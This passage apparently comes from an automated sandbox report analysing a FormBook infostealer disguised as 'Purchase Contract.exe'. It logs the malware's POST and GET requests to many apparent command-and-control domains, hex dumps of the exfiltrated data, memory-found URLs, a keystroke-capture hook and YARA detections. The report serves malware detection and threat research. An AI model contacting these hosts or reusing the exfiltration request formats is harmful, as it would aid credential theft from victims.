70 68 66 35 53 35 51 74 57 77 4d 4e 52 36 6b 6d 57 5a 4e 66 48 73 56 49 64 4e 49 61 67 79 35 46 4c 54 55 32 71 6c 4c 44 70 55 46 4a 32 6f 4f 33 4e 53 69 48 59 54 4d 48 4e 4a 4b 6c 64 52 69 74 51 52 62 6f 77 69 68 2d 46 30 6a 57 73 64 64 4f 7e 50 44 42 4d 6d 76 42 57 6f 33 35 65 44 59 58 4c 70 74 5f 38 46 36 4c 4c 4f 7a 4c 57 73 61 59 4c 43 42 50 52 4e 37 31 57 45 7a 6e 52 5a 37 34 48 74 67 52 75 61 4c 6e 6f 75 4e 67 30 2d 36 74 4a 79 71 53 6e 67 51 52 68 57 54 67 47 76 61 31 4f 74 6f 63 6f 75 55 37 59 74 34 74 46 65 73 77 28 7a 50 36 50 30 52 71 41 31 4d 31 70 63 70 48 64 58 70 32 52 4a 51 6c 32 77 45 48 28 6d 7a 58 6b 69 46 33 28 57 35 43 73 65 39 30 76 58 69 42 30 67 57 68 28 52 4c 34 53 76 5a 5a 35 38 76 5f 41 7a 51 4f 75 70 41 39 39 5a 6c 76 71 73 78 78 4d 39 43 4e 41 48 79 63 73 75 30 64 4f 42 67 37 4e 75 39 35 52 57 67 61 39 51 4c 77 33 30 31 64 39 37 4d 45 74 4e 38 5f 62 48 4c 6b 57 67 69 47 4e 51 75 54 52 70 30 71 50 69 46 46 58 73 32 73 38 31 6e 33 6f 76 71 4b 6e 63 6a 34 63 4e 38 79 6a 62 33 68 62 65 41 63 35 55 6b 73 52 4a 5a 6e 31 45 74 39 78 6b 41 7a 66 61 61 74 5a 7a 72 79 74 64 59 65 72 2d 4e 6c 58 4d 4d 38 6a 78 69 30 46 67 4c 56 58 58 6a 74 4a 6e 61 72 4d 68 46 4a 64 32 70 4b 28 71 61 77 65 74 6f 42 6d 30 56 63 54 32 55 4a 6d 35 4c 4d 58 33 6f 66 46 77 6c 63 30 76 62 62 5a 48 66 5a 45 6d 30 59 4d 4c 32 6a 61 79 6f 37 6b 73 67 61 33 5a 7a 66 37 34 41 2d 4c 63 36 41 4a 50 43 4a 31 4e 4c 4f 36 68 4f 32 48 68 48 71 75 67 44 6d 30 7a 56 42 71 50 7a 7a 75 2d 6e 43 6b 37 38 45 76 67 76 34 4e 53 70 30 6d 48 35 58 67 74 55 76 58 62 63 38 76 57 48 52 5a 69 41 58 42 5f 55 65 28 59 33 39 4c 59 4f 66 34 5f 30 52 6b 4a 51 6f 37 4e 42 42 62 56 4e 69 62 46 62 52 6a 59 56 78 6a 69 6a 70 49 43 6d 38 35 74 34 7a 56 33 47 44 51 58 77 68 70 6b 39 6a 6b 36 51 5a 50 64 73 2d 53 4b 31 4d 48 61 6b 6c 5a 57 70 38 7e 4a 69 65 4c 63 38 44 49 4d 4a 53 37 34 56 6a 4a 44 47 6d 4a 41 7e 41 5a 58 52 41 4f 5a 36 5a 70 4d 4c 42 56 38 6d 66 4f 37 50 5f 52 6e 46 78 69 2d 56 34 69 56 39 46 77 5f 6a 76 4
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.vamojunto.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.vamojunto.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vamojunto.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 4f 62 62 55 6b 71 7a 4a 67 57 41 6d 39 35 72 51 4c 42 56 79 47 71 6e 68 4d 6b 41 76 37 31 76 58 46 4d 4b 44 4f 36 49 36 70 77 31 59 51 51 72 54 56 6e 69 78 6b 69 77 43 28 42 38 43 6d 6b 72 6e 67 51 5a 5f 46 4b 74 2d 71 31 48 71 32 69 5a 35 74 6b 50 34 6b 36 6a 35 7e 44 6c 72 44 37 68 2d 6d 59 6e 41 28 38 69 79 7e 54 57 4a 36 4b 46 6a 50 4b 51 32 50 56 35 52 47 7a 61 32 59 56 57 55 7e 42 78 64 50 2d 31 62 63 52 61 43 44 63 6e 34 34 34 62 32 64 4e 6e 4c 67 70 6f 64 7e 46 69 78 72 34 54 4d 5a 56 53 68 53 5f 7a 61 6c 30 47 37 42 50 73 38 4b 61 35 4b 36 32 4d 78 6b 75 70 55 79 47 73 52 35 5a 41 37 53 66 57 36 34 43 56 6f 4e 6d 45 56 66 4d 46 77 76 35 75 6f 7e 6b 30 62 73 2d 4f 42 75 55 69 6b 49 73 32 54 44 57 73 71 50 75 73 33 4a 5f 6a 2d 73 58 63 66 54 4c 76 70 6c 32 49 58 7e 63 4e 38 4a 34 67 65 48 66 49 30 37 33 61 67 32 37 44 36 4e 45 30 55 37 53 47 72 61 37 33 6a 6c 42 77 75 71 6b 34 53 57 58 53 4d 30 44 73 6f 54 56 73 44 7e 56 6d 67 50 4a 35 49 73 4c 53 4e 75 43 67 67 48 75 50 79 65 51 63 6a 41 72 6b 71 5a 71 72 57 76 44 70 4a 4c 7a 33 62 38 33 51 35 72 37 7e 75 75 48 5a 46 4b 5f 64 78 68 37 58 6c 73 41 51 59 28 6f 65 34 51 70 6d 31 4d 55 6f 61 63 6a 52 51 41 36 77 45 44 30 33 4e 77 38 79 72 6d 4d 6c 57 6e 38 54 44 75 51 59 59 48 62 74 75 49 78 51 76 7e 6a 6e 56 52 61 64 71 37 52 62 46 6b 6b 43 77 33 32 78 68 49 6d 52 73 75 63 53 63 53 63 45 37 79 31 36 78 7a 4a 46 35 7e 7a 52 47 6d 70 34 79 28 52 61 54 6b 58 4c 72 4c 57 38 48 62 72 53 2d 4d 33 66 72 4b 31 53 59 34 6c 51 43 51 44 59 72 72 51 6e 42 49 61 33 76 6f 47 56 54 44 69 70 32 79 36 36 5a 56 39 5a 71 70 63 6f 4e 74 70 6c 6a 53 7a 71 51 6f 71 46 6a 6d 49 66 47 62 7a 42 75 77 54 50 78 4a 4c 49 62 70 46 55 6a 69 6e 62 43 34 37 70 56 64 72 48 68 31 32 76 6e 35 6b 78 44 61 59 35 4f 76 33 38 6d 65 61 53 74 72 69 74 51 54 4c 36 54 72 35 79 36 66 77 6a 36 44 4f 67 57 45 6c 30 4a 57 6c 76 68 4a 37 39 6d 44 4f 52 64 74 34 4d 79 48 79 44 70 59 53 65 30 79 67 34 7a 65 65 4f 46 75 72 50 39 6a 41 37 51 58 4a 41 4e 49 74 50 33 34 55 6e 49 75 4b 54 38 57 63 57 43 6b 34 4a 73 57 51 5a 70 6e 76 46 71 47 46 59 6c 75 2d 35 2d 56 5f 65 46 32 37 56 32 7e 4f 70 65 43 4d 57 4a 6e 69 55 31 39 4e 6b 67 34 54 4e 59 70 35 37 31 71 6e 6c 4d 67 72 65 55 33 2d 35 6b 31 61 66 4a 58 79 28 53 58 69 4a 45 41 2d 59 31 72 2d 66 6c 6e 5a 73 46 4d 47 73 57 79 64 39 4c 74 4c 63 79 6c 43 66 39 6b 55 79 6d 73 51 62 6f 46 4b 76 4c 61 65 55 78 67 55 41 46 77 57 54 7a 64 77 52 48 6a 47 4d 65 67 35 7e 4b 36 5f 72 5a 58 56 71 63 7a 51 7a 7a 37 43 59 6a 38 36 74 71 45 35 33 4f 72 41 70 78 79 75 47 52 52 48 68 47 52 69 4d 4
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=jbVBrWG8kPPy1CntJKnIS/p3pTRMEOwQ7pcd0/8muHz8lgjxNZOf5/N47Cv4WKIkQI5C HTTP/1.1Host: www.bookwormegy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?Kxlpd=usiFhkEA2/xQfSWIf5NGRhfLT8+t9rWHJvPEvA/+NM3yMCY4ViL3D3aLSorWeJjb+qc5&tpeDP4=aN6tXx HTTP/1.1Host: www.bridgejfc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?Kxlpd=YpYaXTMBQs0E5vLJ/Yd9Yn8LoZOIuIOD62g1IdciXa5/abOgLLAXWzIHQlYdUNrQ6hv1&tpeDP4=aN6tXx HTTP/1.1Host: www.3dlasermaroc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=2djJOWHHKK7eyXP0GpI/PgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tCFLL5Q3Er2 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=bMzkr1fzZV+5QtXNWK4LXWvgw9C8VqyMR5lohTVdFC9G3pcizxH8g+YNb0t5pLB/ZO8J HTTP/1.1Host: www.yyw518.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?Kxlpd=G5Xu6NHE4SkrvqPWXnU3UeXHC3kT8kLmWInNSoQ44xAbeTfsQH//0ntHgBoI/3bOih10&tpeDP4=aN6tXx HTTP/1.1Host: www.vamojunto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.zcs-edu.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.bridgejfc.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.bridgejfc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bridgejfc.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 6d 4f 75 5f 28 41 35 4c 69 6f 59 44 41 52 47 4b 43 5f 38 51 4c 6b 76 50 63 65 69 76 71 4c 79 44 59 59 28 47 28 77 54 6c 4e 66 69 77 43 51 42 68 5a 33 7e 48 52 69 37 38 41 59 6d 73 5a 5a 76 44 76 76 67 39 6d 47 63 45 4f 77 28 6c 45 48 4c 52 6d 51 76 6e 4f 53 4c 4a 32 34 75 31 6b 4d 51 64 6f 62 70 6d 76 72 6d 4d 6e 62 53 74 67 6d 5a 50 59 66 75 64 68 38 30 4a 4d 51 4a 51 64 68 37 4e 75 7a 31 6e 4f 33 79 78 28 4f 4a 78 32 32 4d 79 6b 39 4f 4e 76 53 58 56 41 48 6c 77 6c 2d 41 42 69 58 31 59 36 59 30 39 6b 78 46 44 58 72 73 75 4a 76 4c 76 39 38 43 33 47 78 68 58 6e 67 6f 73 73 42 4f 30 64 5f 66 59 57 33 42 49 75 39 47 46 71 48 37 57 6a 44 62 50 5a 7a 77 50 67 46 41 46 4b 36 31 55 6a 63 5a 58 49 77 62 6f 69 48 71 2d 63 54 28 36 65 66 37 6c 46 49 4f 49 51 44 57 76 31 62 62 54 54 4e 78 58 71 5a 47 35 52 6b 7e 34 4a 54 71 67 6a 44 68 35 42 66 71 59 33 6f 41 33 38 76 75 38 36 55 45 42 66 71 4c 4f 31 4a 74 75 72 50 32 56 38 78 51 78 38 63 6c 44 36 72 4d 52 66 4d 63 41 62 47 73 62 4f 44 56 45 59 73 30 46 42 57 57 74 73 6d 55 77 51 72 51 42 44 69 4f 53 74 47 65 6a 36 48 6e 75 44 57 46 4a 75 34 48 74 63 61 75 34 78 63 65 71 7a 46 4c 34 4a 30 30 70 79 50 50 67 69 65 67 54 7e 62 57 36 4d 63 36 48 45 34 71 51 32 6f 39 33 62 5f 66 37 6b 73 4e 79 36 75 68 69 30 49 42 46 34 45 47 6f 6e 32 66 4d 56 7a 6f 46 68 4d 72 78 41 69 64 44 64 6f 54 6a 31 45 43 4e 47 36 71 35 28 30 67 33 33 34 63 2d 6e 4a 35 51 33 57 58 39 4f 53 33 79 73 67 4d 72 53 53 73 57 39 6c 62 68 61 56 41 48 6c 54 62 4f 37 4d 74 53 31 63 67 51 47 76 54 64 77 53 69 50 6a 46 77 61 4c 65 6d 55 53 72 52 50 66 58 52 63 72 74 4a 4b 65 74 68 62 78 39 4d 4c 76 36 67 34 74 31 5a 63 72 58 4b 6d 41 64 70 48 33 6f 51 59 38 5f 79 56 70 5f 32 47 67 2d 56 33 42 30 42 74 39 52 73 45 78 54 36 42 54 49 6f 63 6e 64 68 6c 68 72 7a 79 73 41 75 48 75 76 48 75 6b 57 68 6e 52 48 58 68 78 32 4a 74 41 6f 74 73 50 61 79 49 41 67 38 6b 52 33 69 51 78 6e 6a 47 57 58 35 41 33 5a 79 31 36 75 35 4a 47 7a 58 76 78 59 6f 41 32 4c 46 64 74 56 49 30 7a 59 74 7a 65 6d 68 6c 48 75 30 77 32 35 52 76 74 72 55 76 66 37 68 56 51 74 72 68 72 53 71 30 77 41 6c 31 63 56 30 4c 71 36 72 54 6e 70 43 66 52 50 4f 64 6d 44 78 52 31 75 4d 6d 76 45 65 42 43 44 73 69 33 30 35 65 6c 68 49 59 54 75 77 31 52 71 30 4c 70 61 69 78 30 6f 43 4d 43 57 31 4d 77 55 34 78 71 6f 6d 30 4a 68 53 34 48 32 4d 32 71 62 59 6e 31 70 4a 52 46 49 67 61 79 68 50 33 4b 48 66 79 39 56 55 45 47 2d 6d 61 58 48 45 43 4f 41 62 46 78 4b 36 76 71 55 67 6e 75 38 56 41 33 53 54 2d 76 52 4e 78 41 38 30 68 55 7a 74 66 71 68 4c 44 5a 46 67 57 4d 4c 6f 75 47 5f 50 48 46 33 4c 6
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 Apr 2020 01:16:56 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.com/mq3/www.porcber.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.786545955.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com/mq3/www.3dlasermaroc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.com/mq3/www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news/mq3/www.axcyl.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.newsReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com/mq3/www.matbaadukkanim.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.com/mq3/www.shimi783.info
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.com/mq3/www.brandbank.news
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.comReferer:
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com/mq3/www.kafakoc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/www.samdeng.works
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.com/mq3/www.vamojunto.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works/mq3/www.yyw518.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.worksReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/www.qadmin.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.infoReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.com/mq3/www.bookwormegy.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmp, control.exe, 00000003.00000002.2009171138.0000000004B39000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmp, control.exe, 00000003.00000002.2009171138.0000000004B39000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.com/mq3/S
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.com/mq3/www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.com/mq3/www.usepelican.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 00000003.00000002.2009341163.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=vamojunto&amp;e=com
Source: control.exe, 00000003.00000002.2009341163.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=vamojunto&e=com
Source: control.exe, 00000003.00000002.2009341163.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: https://www.samdeng.works/mq3?Kxlpd=OPoK3Mmn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY
